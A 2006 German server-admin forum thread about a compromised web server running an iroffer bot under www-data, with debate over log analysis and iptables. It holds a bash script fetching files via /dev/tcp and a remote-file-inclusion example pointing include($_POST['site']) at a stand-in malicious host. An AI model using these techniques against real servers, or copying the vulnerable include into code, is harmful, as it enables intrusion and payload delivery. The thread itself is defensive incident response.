Page 1 of 2
www-data hacked
Posted: 2006-11-02 10:34
by tcsoft
Hallo Leute!
Ich bin vor einigen Tagen einem Angriff auf meinen Server draufgekommen.
und zwar wurde mit dem benutzer "www-data" ein verzeichnis im tmp angelegt: /var/tmp/.,
darin befand sich das programm stats "iroffer" (iroffer.org) - so ein filesharing programmchen. in einem weiteren unterordner schon ein paar files mit insg. fast 3Gigabyte! im hintergrund lief ein prozess namens "stats 11.txt".
alle dateien wurden mit dem benutzer www-data erstellt und das lässt schließen, dass der angreifer genau über diesen Benutzer zugriff erlangte - nur weiß ich nicht wie. Ists der Webserver (lighttpd 1.4.11) oder php5 (5.1.6-0.dotdeb.2). ich tippe ja stark auf php - aber wo liegt die schwachstelle? :roll: :roll:
mfg
Re: www-data hacked
Posted: 2006-11-02 10:44
by mattiass
tcsoft wrote: ich tippe ja stark auf php - aber wo liegt die schwachstelle? :roll: :roll:
Anfällige Versionen eines CMS oder Boards. Bitte nutze die Suchfunktion.
Re: www-data hacked
Posted: 2006-11-02 10:47
by tcsoft
Bitte nutze die Suchfunktion.
okay.....
nur dass mir die nichts nützliches bringt. weiß ja ned nach was ich suche
Re: www-data hacked
Posted: 2006-11-02 10:49
by mattiass
tcsoft wrote:Bitte nutze die Suchfunktion.
okay.....
nur dass mir die nichts nützliches bringt. weiß ja ned nach was ich suche
Was für CMS' laufen auf dem Server? Was für Boards? Welche Webmailer? Welche Administrations-Webfrontends? Mit deren Namen hier zu suchen, dürfte schon einige Ergebnisse bringen.
Hast Du die Logs schon nach auffällig langen Requests durchgegreppt?
Re: www-data hacked
Posted: 2006-11-02 11:02
by tcsoft
cms-systeme laufen bei mir keine. auch keine boards. webmailer nur squirrelmail. admin-panels sowieso ned.
logs durchstöbern - ich hab mir die syslog, auth.log und die lighttpd-log access.log zu gemüte geführt. error.log hab ich mal ausglassen, weil da stehen sowieso elends viele einträge drin.
vll kannst du mir den grep suchausdruck sagen, der nach langen request filtert (nur ca.)?
Re: www-data hacked
Posted: 2006-11-02 11:38
by djcrackman
Um mal ein Beispiel zu nennen.
Re: www-data hacked
Posted: 2006-11-02 11:52
by tcsoft
cat access.log | grep wget
oh mann, danke dir. dass man nach wget suchen muss wusste ich ned. da gabs in der tat angriffe. vorwiegend mambo und phpbb wurde probiert, hab ich nicht installiert.
Re: www-data hacked
Posted: 2006-11-02 12:37
by Joe User
Welche PHP/Perl/Python/Ruby/$interpreter-Scripte sind denn installiert?
Re: www-data hacked
Posted: 2006-11-02 12:48
by tcsoft
PHP:
squirrelmail
ShowIt
phpMyAdmin
smarty
Perl:
mailgraph
postgrey
awstats
mehr fällt mir adhoc nicht ein.
Re: www-data hacked
Posted: 2006-11-02 13:05
by sledge0303
Ich tippe mal auf Squirrelmail...
Re: www-data hacked
Posted: 2006-11-02 13:36
by lord_pinhead
Welche Version hat awstats und ist das Tool öffentlich zugänglich oder nur nach anmeldung?
Re: www-data hacked
Posted: 2006-11-02 13:58
by superdreadnought
schon mal was von iptables gehört?
Re: www-data hacked
Posted: 2006-11-02 14:00
by mattiass
Superdreadnought wrote:schon mal was von iptables gehört?
Was soll das in diesem Zusammenhang bringen?
Re: www-data hacked
Posted: 2006-11-02 14:11
by superdreadnought
erstmal alle unbenötigen ports auch unter OUTPUT auf DROP => hilf ggn sein filesharing ding.
stateful inspection (nur rauslassen, was von außen auch angefordert wurde) => ggn wget
Re: www-data hacked
Posted: 2006-11-02 14:13
by djcrackman
Und wenn du mal mit wget etwas ziehen willst (Patch, Archiv, etc) dann schaust du blöd - schon lange keinen so blöden Vorschlag gehört.
Entweder ich habe einen root unter Kontrolle - oder nicht, dann sollte ich aber auch die Finger davon lassen und mich nicht blindlinks auf iptables oder Sonstiges verlassen.
Re: www-data hacked
Posted: 2006-11-02 14:19
by superdreadnought
was wollmer denn nu? sicherheit oder bequemlichkeit?
Re: www-data hacked
Posted: 2006-11-02 14:25
by mattiass
Superdreadnought wrote:was wollmer denn nu? sicherheit oder bequemlichkeit?
Beides! Die "iptables" helfen begrenzt. Beispielsweise kann man verhindern, dass ein von Malware geöffneter Port erreichbar ist. Das Nachladen von Schadcode per "wget" wirst Du kaum verhindern können, weil Du so auch verhinderst, dass jemand RSS-Feeds von anderen Servern zieht. Auch die meisten anderen ausgehenden Verbindungen zu sperren beeinträchtigt legitime Dienste massiv.
Also versuche bitte, konstruktiv an der Lösung des Problems mitzuwirken, anstatt hier groß den Guru rauszuhängen.
Re: www-data hacked
Posted: 2006-11-02 14:34
by superdreadnought
ich lass nicht "groß den guru raushängen", sondern biete vorschläge. ich gebe zu, dasses übertrieben ist, gleich alles ausgehende zu blocken, aber wenn man es richtig macht, ist es ein mächtiges werkzeug.
erzähl mir zb. mal, wann ein webserver von sich aus irgendwas sendet ...
ich hatte auf meinem alten server mal probeweiße so krasse filter regeln drinnen und es hat funktioniert.
Re: www-data hacked
Posted: 2006-11-02 14:38
by mattiass
Superdreadnought wrote:
erzähl mir zb. mal, wann ein webserver von sich aus irgendwas sendet ...
Es ist nicht ungewöhnlich, per HTTP-Request Feeds einzusammeln. Und es ist ebenfalls nicht ungewöhnlich, auf hohen Ports probeweise andere HTTPD-Instanzen zu starten.
Re: www-data hacked
Posted: 2006-11-02 14:39
by Joe User
Code: Select all
#!/bin/bash
if [ $# = 0 ]; then
echo "Usage: http-get <URL>" >&2
exit 1
fi
URL=${1##http://} &&
SERVER=${URL%%/*} &&
FULLFILENAME=${URL#$SERVER} &&
FILENAME=${FULLFILENAME##*/}
echo -n "Fetching $SERVER$FULLFILENAME... "
(echo -e "GET $FULLFILENAME HTTP/0.9rnrn" 1>&3 &
cat 0<&3) 3<> /dev/tcp/$SERVER/80 | (
read i
while [ x"$(echo $i | tr -d 'r')" != "x" ]
do
read i
done
cat
) >$FILENAME
echo "done."
:roll:
Re: www-data hacked
Posted: 2006-11-02 14:44
by superdreadnought
bei mir hats auf jeden fall gut funktioniert. es wär mir aber absolut neu, wenn der httpd auf nem anderen port als 80 läuft (es sei denn es ist so konfiguriert) ...
Re: www-data hacked
Posted: 2006-11-02 14:52
by Joe User
Superdreadnought wrote:es wär mir aber absolut neu, wenn der httpd auf nem anderen port als 80 läuft
Du solltest Dich mal mit HTTPS und mod_proxy beschäftigen...
Re: www-data hacked
Posted: 2006-11-02 15:17
by superdreadnought
dass ssl auf 443 läuft is mir klar (wobei ich schonmal i-wie erwähnt hab, dass ich persönlich die finger von open_ssl weg lass ...) und wenn's ums proxying geht is das auch en andere sache.
Re: www-data hacked
Posted: 2006-11-02 16:35
by rootsvr
Die einzige Methode mit ner Firewall sicher zu gehen ist folgende:
http://home.pages.at/heaven/absolut.htm
Per iptables alles zu verbieten ist in meinen Augen nicht spo optimal, aber wenn Du damit glücklich wirst..
Superdreadnought wrote:
ich hatte auf meinem alten server mal probeweiße so krasse filter regeln drinnen und es hat funktioniert.
"Krasse Regeln" Kenn so eine Sprache nur von Kiddies die sich gegenseitig krass aufs Maul hauen wollen..
hilft auch.. kein angreifer kommt durch *SCNR*
@Threadersteller: Welche Versionen von den Dingern hast Du drauf, Awstats im Interaktiven Modus ist angreifbar (gewesen?), Für Smarty gab es auch schon Schwachstellen, ältere Versionen von Squirrelmail hatten nen Bug.
Ansonsten bei selbsterstellter Webseite ist öfter mal ein include($_POST['site']) zu finden
was benutzt werden sollte um unterschiedliche Seiten darzustellen aber recht faszinierende Dinge macht, wenn stattdessen site=
http://boeserserver.com/ganzboesescript.php genutzt wird (eigene Erfahrung)
Re: www-data hacked
Posted: 2006-11-02 16:57
by superdreadnought
krass is ein deutsches wort (synonym: extrem) und weder kiddie noch hopper slang - glaub mir, so tief bin ich nicht gesunken, aber wenn du kein deutsch kannst ...
deine filterregeln sind vorallem dann gut, wenn man auf den server nur mit ssh drauf kommt ...